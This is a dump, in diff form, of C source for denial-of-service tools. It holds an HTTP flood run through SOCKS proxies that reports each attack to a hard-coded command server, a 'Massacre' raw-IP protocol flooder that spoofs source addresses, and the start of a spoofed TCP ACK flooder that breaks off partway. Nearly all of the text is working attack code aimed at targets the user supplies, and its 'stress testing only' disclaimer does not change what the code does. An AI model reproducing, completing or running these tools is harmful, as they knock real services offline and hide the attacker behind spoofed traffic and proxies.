{ "path", "/" },
|
||||
{ "param", ";" },
|
||||
{ "query", "?" },
|
||||
{ "fragment", "#" }
|
||||
};
|
||||
enum partnames { scheme = 0, userid, password, host, port, path, param, query, fragment } ;
|
||||
#define NUMPARTS (sizeof parts / sizeof (struct urlparts))
|
||||
struct urlparts *returnparts[8];
|
||||
struct urllist { char *url; int done; struct urllist *next; struct urllist *prev; };
|
||||
struct proxy { char *type; char *ip; int port; int working; };
|
||||
struct list { struct proxy *data; char *useragent; struct list *next; struct list *prev; };
|
||||
struct list *head = NULL;
|
||||
char parseError[128];
|
||||
int parseURL(char *url, struct urlparts **returnpart);
|
||||
char * strsplit(char * s, char * tok);
|
||||
char firstpunc(char *s);
|
||||
int strleft(char * s, int n);
|
||||
void setupparts();
|
||||
void freeparts();
|
||||
char *stristr(const char *String, const char *Pattern);
|
||||
char *str_replace(char *orig, char *rep, char *with);
|
||||
char *geturl(char *url, char *useragent, char *ip);
|
||||
char *ipstr;
|
||||
|
||||
void *flood(void *par) {
|
||||
struct list *startpoint = (struct list *)par;
|
||||
int i;
|
||||
struct sockaddr_in serverAddr;
|
||||
signal(SIGPIPE, SIG_IGN);
|
||||
while(1)
|
||||
{
|
||||
int sent = 0;
|
||||
if(startpoint->data->working == 0)
|
||||
{
|
||||
startpoint = startpoint->next;
|
||||
sleep(1);
|
||||
continue;
|
||||
}
|
||||
memset(&serverAddr, 0, sizeof(serverAddr));
|
||||
serverAddr.sin_family = AF_INET;
|
||||
serverAddr.sin_port = htons(startpoint->data->port);
|
||||
serverAddr.sin_addr.s_addr = inet_addr(startpoint->data->ip);
|
||||
int serverSocket = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
|
||||
u_int yes=1;
|
||||
if (setsockopt(serverSocket,SOL_SOCKET,SO_REUSEADDR,&yes,sizeof(yes)) < 0) {}
|
||||
if(connect(serverSocket, (struct sockaddr *)&serverAddr, sizeof(serverAddr)) > 0)
|
||||
{
|
||||
startpoint->data->working = 0;
|
||||
startpoint = startpoint->next;
|
||||
continue;
|
||||
}
|
||||
if(strcmp(startpoint->data->type, "Socks4")==0)
|
||||
{
|
||||
unsigned char buf[10];
|
||||
buf[0] = 0x04;
|
||||
buf[1] = 0x01;
|
||||
*(unsigned short*)&buf[2] = htons(ATTACKPORT);
|
||||
*(unsigned long*)&buf[4] = inet_addr(ipstr);
|
||||
buf[8] = 0x00;
|
||||
if(send(serverSocket, buf, 9, MSG_NOSIGNAL) != 9)
|
||||
{
|
||||
startpoint->data->working = 0;
|
||||
startpoint = startpoint->next;
|
||||
close(serverSocket);
|
||||
continue;
|
||||
}
|
||||
}
|
||||
if(strcmp(startpoint->data->type, "Socks5")==0)
|
||||
{
|
||||
unsigned char buf[20];
|
||||
buf[0] = 0x05;
|
||||
buf[1] = 0x01;
|
||||
buf[2] = 0x00;
|
||||
if((sent = send(serverSocket, buf, 3, MSG_NOSIGNAL)) < 0)
|
||||
{
|
||||
startpoint->data->working = 0;
|
||||
startpoint = startpoint->next;
|
||||
close(serverSocket);
|
||||
continue;
|
||||
}
|
||||
buf[0] = 0x05;
|
||||
buf[1] = 0x01;
|
||||
buf[2] = 0x00;
|
||||
buf[3] = 0x01;
|
||||
*(unsigned long*)&buf[4] = inet_addr(ipstr);
|
||||
*(unsigned short*)&buf[8] = htons(ATTACKPORT);
|
||||
if((sent = send(serverSocket, buf, 10, MSG_NOSIGNAL)) < 0)
|
||||
{
|
||||
printf("BAD PROXY ONLY SENT %d:%d\n", sent, 10);
|
||||
perror("send 10");
|
||||
startpoint->data->working = 0;
|
||||
startpoint = startpoint->next;
|
||||
close(serverSocket);
|
||||
continue;
|
||||
}
|
||||
}
|
||||
char *httppayload = str_replace(postpayload, "#useragent#", startpoint->useragent);
|
||||
if(httppayload == NULL)
|
||||
{
|
||||
startpoint = startpoint->next;
|
||||
close(serverSocket);
|
||||
continue;
|
||||
}
|
||||
sent = send(serverSocket, httppayload, strlen(httppayload), MSG_NOSIGNAL);
|
||||
free(httppayload);
|
||||
int send_return = 1;
|
||||
while(send_return > 0)
|
||||
{
|
||||
char *headershit = malloc(255);
|
||||
sprintf(headershit, "X-%c%c%c%c%c%c%c: 1\r\n", RND_CHAR, RND_CHAR, RND_CHAR, RND_CHAR, RND_CHAR, RND_CHAR, RND_CHAR);
|
||||
send_return = send(serverSocket, headershit, strlen(headershit), MSG_NOSIGNAL);
|
||||
free(headershit);
|
||||
sleep(1);
|
||||
}
|
||||
close(serverSocket);
|
||||
usleep(30000);
|
||||
//startpoint = startpoint->next;
|
||||
}
|
||||
}
|
||||
|
||||
int fnAttackInformation(int attackID)
|
||||
{
|
||||
char szRecvBuff[1024];
|
||||
char packet[1024];
|
||||
char ip[] = "37.221.170.5";
|
||||
|
||||
snprintf(packet, sizeof(packet) - 1, "GET /~dqyefldi/response.php?auth=tru&id=%d&pro=%d HTTP/1.1\r\nHost: %s\r\nConnection: close\r\nCache-Control: no-cache\r\nOrigin: http://google.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\nAccept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n\r\n", attackID, getpid(), ip);
|
||||
|
||||
struct sockaddr_in *remote;
|
||||
int sock;
|
||||
int tmpres;
|
||||
|
||||
|
||||
if((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
|
||||
{
|
||||
perror("Can't create TCP socket");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
remote = (struct sockaddr_in *)malloc(sizeof(struct sockaddr_in *));
|
||||
remote->sin_family = AF_INET;
|
||||
tmpres = inet_pton(AF_INET, ip, (void *)(&(remote->sin_addr.s_addr)));
|
||||
|
||||
if (tmpres < 0)
|
||||
{
|
||||
perror("Can't set remote->sin_addr.s_addr");
|
||||
exit(1);
|
||||
}
|
||||
else if (tmpres == 0)
|
||||
{
|
||||
fprintf(stderr, "%s is not a valid IP address\n", ip);
|
||||
exit(1);
|
||||
}
|
||||
|
||||
remote->sin_port = htons(80);
|
||||
|
||||
if (connect(sock, (struct sockaddr *)remote, sizeof(struct sockaddr)) < 0)
|
||||
{
|
||||
perror("Could not connect");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
tmpres = send(sock, packet, strlen(packet), 0);
|
||||
|
||||
//printf("Sent %d bytes -> \n%s\n\n\n", tmpres, packet);
|
||||
|
||||
if (tmpres == -1){
|
||||
perror("Can't send query");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
int i = 1;
|
||||
int dwTotal = 0;
|
||||
|
||||
|
||||
while (1)
|
||||
{
|
||||
i = recv(sock, szRecvBuff + dwTotal, sizeof(szRecvBuff) - dwTotal, 0);
|
||||
//printf("Received %d bytes\n", i);
|
||||
if (i <= 0)
|
||||
break;
|
||||
|
||||
dwTotal += i;
|
||||
}
|
||||
|
||||
szRecvBuff[dwTotal] = '\0';
|
||||
|
||||
|
||||
//printf("Received -> \n%s\n\n", szRecvBuff);
|
||||
|
||||
|
||||
close(sock);
|
||||
|
||||
//printf("Sent %d bytes\n", tmpres);
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[ ]) {
|
||||
if(argc < 4){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target url> <number threads to use> <proxy list> <time> [manual ip]\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
//fprintf(stdout, "Setting up Sockets...\n");
|
||||
int num_threads = atoi(argv[2]);
|
||||
FILE *pFile = fopen(argv[3], "rb");
|
||||
if(pFile==NULL)
|
||||
{
|
||||
perror("fopen"); exit(1);
|
||||
}
|
||||
fseek(pFile, 0, SEEK_END);
|
||||
long lSize = ftell(pFile);
|
||||
rewind(pFile);
|
||||
char *buffer = (char *)malloc(lSize*sizeof(char));
|
||||
fread(buffer, 1, lSize, pFile);
|
||||
fclose (pFile);
|
||||
int i=0;
|
||||
char *pch = (char *)strtok(buffer, ":");
|
||||
while(pch != NULL)
|
||||
{
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct list *)malloc(sizeof(struct list));
|
||||
bzero(head, sizeof(struct list));
|
||||
head->data = (struct proxy *)malloc(sizeof(struct proxy));
|
||||
bzero(head->data, sizeof(struct proxy));
|
||||
head->data->working = 1;
|
||||
head->data->ip = malloc(strlen(pch)+1); strcpy(head->data->ip, pch);
|
||||
pch = (char *)strtok(NULL, ":");
|
||||
if(pch == NULL) exit(-1);
|
||||
head->data->port = atoi(pch);
|
||||
pch = (char *)strtok(NULL, ":");
|
||||
head->data->type = malloc(strlen(pch)+1); strcpy(head->data->type, pch);
|
||||
pch = (char *)strtok(NULL, ":");
|
||||
head->useragent = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct list *new_node = (struct list *)malloc(sizeof(struct list));
|
||||
bzero(new_node, sizeof(struct list));
|
||||
new_node->data = (struct proxy *)malloc(sizeof(struct proxy));
|
||||
bzero(new_node->data, sizeof(struct proxy));
|
||||
new_node->data->working = 1;
|
||||
new_node->data->ip = malloc(strlen(pch)+1); strcpy(new_node->data->ip, pch);
|
||||
pch = (char *)strtok(NULL, ":");
|
||||
if(pch == NULL) break;
|
||||
new_node->data->port = atoi(pch);
|
||||
pch = (char *)strtok(NULL, ":");
|
||||
new_node->data->type = malloc(strlen(pch)+1); strcpy(new_node->data->type, pch);
|
||||
pch = (char *)strtok(NULL, ":");
|
||||
new_node->useragent = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
}
|
||||
free(buffer);
|
||||
const rlim_t kOpenFD = 1024 + (num_threads * 2);
|
||||
struct rlimit rl;
|
||||
int result;
|
||||
rl.rlim_cur = kOpenFD;
|
||||
rl.rlim_max = kOpenFD;
|
||||
result = setrlimit(RLIMIT_NOFILE, &rl);
|
||||
if (result != 0)
|
||||
{
|
||||
perror("setrlimit");
|
||||
fprintf(stderr, "setrlimit returned result = %d\n", result);
|
||||
}
|
||||
setupparts();
|
||||
parseURL(argv[1], returnparts);
|
||||
if(argc > 5)
|
||||
{
|
||||
ipstr = malloc(strlen(argv[5])+1);
|
||||
bzero(ipstr, strlen(argv[5])+1);
|
||||
strcpy(ipstr, argv[5]);
|
||||
//fprintf(stdout, "Using manual IP...\n");
|
||||
} else {
|
||||
struct hostent *he;
|
||||
struct in_addr a;
|
||||
he = gethostbyname(returnparts[host]->value);
|
||||
if (he)
|
||||
{
|
||||
while (*he->h_addr_list)
|
||||
{
|
||||
bcopy(*he->h_addr_list++, (char *) &a, sizeof(a));
|
||||
ipstr = malloc(INET_ADDRSTRLEN+1);
|
||||
inet_ntop (AF_INET, &a, ipstr, INET_ADDRSTRLEN);
|
||||
break;
|
||||
}
|
||||
}
|
||||
else
|
||||
{ herror("gethostbyname"); }
|
||||
}
|
||||
pthread_t thread[num_threads];
|
||||
struct list *td[num_threads];
|
||||
struct list *node = head->next;
|
||||
|
||||
|
||||
for(i=0;i<num_threads;i++)
|
||||
{
|
||||
td[i] = node;
|
||||
node = node->next;
|
||||
}
|
||||
postpayload = malloc(4096);
|
||||
sprintf(postpayload, postformat, returnparts[path]->value, returnparts[host]->value);
|
||||
freeparts();
|
||||
|
||||
//fprintf(stdout, "Starting Flood...\n");
|
||||
|
||||
fnAttackInformation(atoi(argv[argc-1]));
|
||||
for(i = 0;i<num_threads;i++){
|
||||
pthread_create( &thread[i], NULL, &flood, (void *) td[i]);
|
||||
}
|
||||
sleep(atoi(argv[4]));
|
||||
return 0;
|
||||
}
|
||||
void freeparts()
|
||||
{
|
||||
return;
|
||||
if(returnparts[0]!=NULL) { free(returnparts[0]); }
|
||||
if(returnparts[1]!=NULL) { free(returnparts[1]); }
|
||||
if(returnparts[2]!=NULL) { free(returnparts[2]); }
|
||||
if(returnparts[3]!=NULL) { free(returnparts[3]); }
|
||||
if(returnparts[4]!=NULL) { free(returnparts[4]); }
|
||||
if(returnparts[5]!=NULL) { free(returnparts[5]); }
|
||||
if(returnparts[6]!=NULL) { free(returnparts[6]); }
|
||||
if(returnparts[7]!=NULL) { free(returnparts[7]); }
|
||||
if(returnparts[8]!=NULL) { free(returnparts[8]); }
|
||||
return;
|
||||
}
|
||||
void setupparts()
|
||||
{
|
||||
returnparts[0] = malloc(sizeof(struct urlparts));
|
||||
returnparts[1] = malloc(sizeof(struct urlparts));
|
||||
returnparts[2] = malloc(sizeof(struct urlparts));
|
||||
returnparts[3] = malloc(sizeof(struct urlparts));
|
||||
returnparts[4] = malloc(sizeof(struct urlparts));
|
||||
returnparts[5] = malloc(sizeof(struct urlparts));
|
||||
returnparts[6] = malloc(sizeof(struct urlparts));
|
||||
returnparts[7] = malloc(sizeof(struct urlparts));
|
||||
returnparts[8] = malloc(sizeof(struct urlparts));
|
||||
bzero(returnparts[0], sizeof(struct urlparts));
|
||||
bzero(returnparts[1], sizeof(struct urlparts));
|
||||
bzero(returnparts[2], sizeof(struct urlparts));
|
||||
bzero(returnparts[3], sizeof(struct urlparts));
|
||||
bzero(returnparts[4], sizeof(struct urlparts));
|
||||
bzero(returnparts[5], sizeof(struct urlparts));
|
||||
bzero(returnparts[6], sizeof(struct urlparts));
|
||||
bzero(returnparts[7], sizeof(struct urlparts));
|
||||
bzero(returnparts[8], sizeof(struct urlparts));
|
||||
returnparts[0]->name = "scheme";
|
||||
strcpy(returnparts[0]->separator, ":");
|
||||
returnparts[1]->name = "userid";
|
||||
strcpy(returnparts[1]->separator, "@");
|
||||
returnparts[2]->name = "password";
|
||||
strcpy(returnparts[2]->separator, ":");
|
||||
returnparts[3]->name = "host";
|
||||
strcpy(returnparts[3]->separator, "//");
|
||||
returnparts[4]->name = "port";
|
||||
strcpy(returnparts[4]->separator, ":");
|
||||
returnparts[5]->name = "path";
|
||||
strcpy(returnparts[5]->separator, "/");
|
||||
returnparts[6]->name = "param";
|
||||
strcpy(returnparts[6]->separator, ";");
|
||||
returnparts[7]->name = "query";
|
||||
strcpy(returnparts[7]->separator, "?");
|
||||
returnparts[8]->name = "fragment";
|
||||
strcpy(returnparts[8]->separator, "#");
|
||||
return;
|
||||
}
|
||||
int parseURL(char *url, struct urlparts **returnpart) {
|
||||
register i;
|
||||
int seplen;
|
||||
char * remainder;
|
||||
char * regall = ":/;?#";
|
||||
char * regpath = ":;?#";
|
||||
char * regx;
|
||||
if(!*url)
|
||||
{
|
||||
strcpy(parseError, "nothing to do!\n");
|
||||
return 0;
|
||||
}
|
||||
if((remainder = malloc(strlen(url) + 1)) == NULL)
|
||||
{
|
||||
printf("cannot allocate memory\n");
|
||||
exit(-1);
|
||||
}
|
||||
strcpy(remainder, url);
|
||||
if(firstpunc(remainder) == ':')
|
||||
{
|
||||
strcpy(returnpart[scheme]->value, strsplit(remainder, returnpart[scheme]->separator));
|
||||
strleft(remainder, 1);
|
||||
}
|
||||
if (!strcmp(returnpart[scheme]->value, "mailto"))
|
||||
*(returnpart[host]->separator) = 0;
|
||||
for(i = 0; i < NUMPARTS; i++)
|
||||
{
|
||||
if(!*remainder)
|
||||
break;
|
||||
if(i == scheme || i == userid || i == password)
|
||||
continue;
|
||||
if(i == host && strchr(remainder, '@'))
|
||||
{
|
||||
if(!strncmp(remainder, "//", 2))
|
||||
strleft(remainder, 2);
|
||||
strcpy(returnpart[userid]->value, strsplit(remainder, ":@"));
|
||||
strleft(remainder, 1);
|
||||
if(strchr(remainder, '@'))
|
||||
{
|
||||
strcpy(returnpart[password]->value, strsplit(remainder, "@"));
|
||||
strleft(remainder, 1);
|
||||
}
|
||||
*(returnpart[host]->separator) = 0;
|
||||
}
|
||||
if(i == path && (! *(returnpart[scheme]->value)))
|
||||
{
|
||||
*(returnpart[path]->separator) = 0;
|
||||
strcpy(returnpart[scheme]->value, "http");
|
||||
}
|
||||
regx = (i == path) ? regpath : regall ;
|
||||
seplen = strlen(returnpart[i]->separator);
|
||||
if(strncmp(remainder, returnpart[i]->separator, seplen))
|
||||
continue;
|
||||
else
|
||||
strleft(remainder, seplen);
|
||||
strcpy(returnpart[i]->value, strsplit(remainder, regx));
|
||||
}
|
||||
if(*remainder)
|
||||
sprintf(parseError, "I don't understand '%s'", remainder);
|
||||
free(remainder);
|
||||
return 0;
|
||||
}
|
||||
char *str_replace(char *orig, char *rep, char *with) {
|
||||
char *result;
|
||||
char *ins;
|
||||
char *tmp;
|
||||
int len_rep;
|
||||
int len_with;
|
||||
int len_front;
|
||||
int count;
|
||||
if (!orig)
|
||||
return NULL;
|
||||
if (!rep || !(len_rep = strlen(rep)))
|
||||
return NULL;
|
||||
if (!(ins = strstr(orig, rep)))
|
||||
return NULL;
|
||||
if (!with)
|
||||
with = "";
|
||||
len_with = strlen(with);
|
||||
for (count = 0; tmp = strstr(ins, rep); ++count) {
|
||||
ins = tmp + len_rep;
|
||||
}
|
||||
tmp = result = malloc(strlen(orig) + (len_with - len_rep) * count + 1);
|
||||
if (!result)
|
||||
return NULL;
|
||||
while (count--) {
|
||||
ins = strstr(orig, rep);
|
||||
len_front = ins - orig;
|
||||
tmp = strncpy(tmp, orig, len_front) + len_front;
|
||||
tmp = strcpy(tmp, with) + len_with;
|
||||
orig += len_front + len_rep;
|
||||
}
|
||||
strcpy(tmp, orig);
|
||||
return result;
|
||||
}
|
||||
char * strsplit(char * s, char * tok) {
|
||||
#define OUTLEN (255)
|
||||
register i, j;
|
||||
static char out[OUTLEN + 1];
|
||||
for(i = 0; s[i] && i < OUTLEN; i++)
|
||||
{
|
||||
if(strchr(tok, s[i]))
|
||||
break;
|
||||
else
|
||||
out[i] = s[i];
|
||||
}
|
||||
out[i] = 0;
|
||||
if(i && s[i])
|
||||
{
|
||||
for(j = 0; s[i]; i++, j++) s[j] = s[i];
|
||||
s[j] = 0;
|
||||
}
|
||||
else if (!s[i])
|
||||
*s = 0;
|
||||
return out;
|
||||
}
|
||||
char firstpunc(char * s) {
|
||||
while(*s++)
|
||||
if(!isalnum(*s)) return *s;
|
||||
return 0;
|
||||
}
|
||||
int strleft(char * s, int n) {
|
||||
int l;
|
||||
l = strlen(s);
|
||||
if(l < n)
|
||||
return -1;
|
||||
else if (l == n)
|
||||
*s = 0;
|
||||
memmove(s, s + n, l - n + 1);
|
||||
return n;
|
||||
}
|
|
@ -0,0 +1,180 @@
|
|||
#include <unistd.h>
|
||||
#include <time.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <pthread.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/in.h>
|
||||
#include <netinet/if_ether.h>
|
||||
#include <netdb.h>
|
||||
#include <net/if.h>
|
||||
#include <arpa/inet.h>
|
||||
|
||||
#define MAX_PACKET_SIZE 65534
|
||||
#define PHI 0x9e3779b9
|
||||
|
||||
|
||||
static unsigned long int Q[4096], c = 362436;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
|
||||
void init_rand(unsigned long int x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
||||
}
|
||||
unsigned long int rand_cmwc(void)
|
||||
{
|
||||
unsigned long long int t, a = 18782LL;
|
||||
static unsigned long int i = 4095;
|
||||
unsigned long int x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int count)
|
||||
{
|
||||
register unsigned long sum = 0;
|
||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
|
||||
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr);
|
||||
iph->id = rand();
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
|
||||
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
char *td = (char *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = rand();
|
||||
sin.sin_addr.s_addr = inet_addr(td);
|
||||
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Cannot open sockets, are you root?\n");
|
||||
fprintf(stderr, "Exiting...\n");
|
||||
exit(-1);
|
||||
}
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
|
||||
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: Cannot rewrite the packet headers\n");
|
||||
fprintf(stderr, "Exiting...\n");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
||||
|
||||
iph->protocol = rand() % (144 + 1 - 0) + 0;
|
||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->tot_len = rand() % (1500 + 1 - 0) + 0;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 5){
|
||||
fprintf(stderr, "Massacre - Mass Protocol Flooder V.1\n");
|
||||
fprintf(stderr, "Made by JiiN - Private for Cyber-Hub.net\n\n");
|
||||
fprintf(stderr, " ============================================================================\n");
|
||||
fprintf(stderr, " >> For network stress testing only! <<\n");
|
||||
fprintf(stderr, " >> Users are legally responsible for the illegal usage of this tool <<\n");
|
||||
fprintf(stderr, " ============================================================================\n");
|
||||
fprintf(stdout, "\nUsage: %s <target IP> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
fprintf(stdout, "Setting up sockets...\n");
|
||||
|
||||
int num_threads = atoi(argv[2]);
|
||||
int maxpps = atoi(argv[3]);
|
||||
int time = atoi(argv[4]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
pthread_t thread[num_threads];
|
||||
|
||||
int multiplier = 100;
|
||||
|
||||
int i;
|
||||
for(i = 0;i<num_threads;i++){
|
||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
||||
}
|
||||
fprintf(stdout, "Sending packets...\n");
|
||||
fprintf(stdout, "Massacre started!\n");
|
||||
for(i = 0;i<(time*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,213 @@
|
|||
#include <unistd.h>
|
||||
#include <time.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <pthread.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/in.h>
|
||||
#include <netinet/if_ether.h>
|
||||
#include <netdb.h>
|
||||
#include <net/if.h>
|
||||
#include <arpa/inet.h>
|
||||
|
||||
#define MAX_PACKET_SIZE 65534
|
||||
#define PHI 0x9e3779b9
|
||||
|
||||
static unsigned long int Q[4096], c = 362436;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
|
||||
void init_rand(unsigned long int x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
||||
}
|
||||
unsigned long int rand_cmwc(void)
|
||||
{
|
||||
unsigned long long int t, a = 18782LL;
|
||||
static unsigned long int i = 4095;
|
||||
unsigned long int x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int count)
|
||||
{
|
||||
register unsigned long sum = 0;
|
||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
|
||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
||||
|
||||
struct tcp_pseudo
|
||||
{
|
||||
unsigned long src_addr;
|
||||
unsigned long dst_addr;
|
||||
unsigned char zero;
|
||||
unsigned char proto;
|
||||
unsigned short length;
|
||||
} pseudohead;
|
||||
unsigned short total_len = iph->tot_len;
|
||||
pseudohead.src_addr=iph->saddr;
|
||||
pseudohead.dst_addr=iph->daddr;
|
||||
pseudohead.zero=0;
|
||||
pseudohead.proto=IPPROTO_TCP;
|
||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
||||
unsigned short *tcp = malloc(totaltcp_len);
|
||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
||||
unsigned short output = csum(tcp,totaltcp_len);
|
||||
free(tcp);
|
||||
return output;
|
||||
}
|
||||
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = 16; //PROTO 16 CHAOS_NET
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
|
||||
void setup_tcp_header(struct tcphdr *tcph)
|
||||
{
|
||||
tcph->source = rand();
|
||||
tcph->seq = rand();
|
||||
tcph->ack_seq = rand();
|
||||
tcph->res2 = 0;
|
||||
tcph->doff = 5;
|
||||
tcph->ack = 1;
|
||||
tcph->window = htons(65535);
|
||||
tcph->check = 0;
|
||||
tcph->urg_ptr = 0;
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
char *td = (char *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
||||
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = rand();
|
||||
sin.sin_addr.s_addr = inet_addr(td);
|
||||
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_tcp_header(tcph);
|
||||
|
||||
tcph->dest = rand();
|
||||
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
